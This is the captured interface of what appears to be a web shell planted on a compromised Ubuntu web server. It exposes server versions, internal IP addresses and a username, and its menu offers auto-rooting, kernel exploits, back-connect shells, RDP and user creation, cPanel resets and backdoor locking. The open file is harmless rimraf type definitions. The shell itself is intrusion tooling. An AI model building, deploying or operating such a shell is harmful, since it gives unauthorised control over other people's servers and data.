Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
rimraf /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.72
KB
-rw-r--r--
package.json
1.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for rimraf 3.0 // Project: https://github.com/isaacs/rimraf // Definitions by: Carlos Ballesteros Velasco <https://github.com/soywiz> // e-cloud <https://github.com/e-cloud> // Ruben Schmidmeister <https://github.com/bash> // Oganexon <https://github.com/oganexon> // Piotr Błażejewicz <https://github.com/peterblazejewicz> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped /// <reference types="node" /> import glob = require('glob'); import fs = require('fs'); declare function rimraf(path: string, options: rimraf.Options, callback: (error: Error) => void): void; declare function rimraf(path: string, callback: (error: Error) => void): void; declare namespace rimraf { /** * It can remove stuff synchronously, too. * But that's not so good. Use the async API. * It's better. */ function sync(path: string, options?: Options): void; /** * see {@link https://github.com/isaacs/rimraf/blob/79b933fb362b2c51bedfa448be848e1d7ed32d7e/README.md#options} */ interface Options { maxBusyTries?: number; emfileWait?: number; /** @default false */ disableGlob?: boolean; glob?: glob.IOptions | false; unlink?: typeof fs.unlink; chmod?: typeof fs.chmod; stat?: typeof fs.stat; lstat?: typeof fs.lstat; rmdir?: typeof fs.rmdir; readdir?: typeof fs.readdir; unlinkSync?: typeof fs.unlinkSync; chmodSync?: typeof fs.chmodSync; statSync?: typeof fs.statSync; lstatSync?: typeof fs.lstatSync; rmdirSync?: typeof fs.rmdirSync; readdirSync?: typeof fs.readdirSync; } } export = rimraf;
Close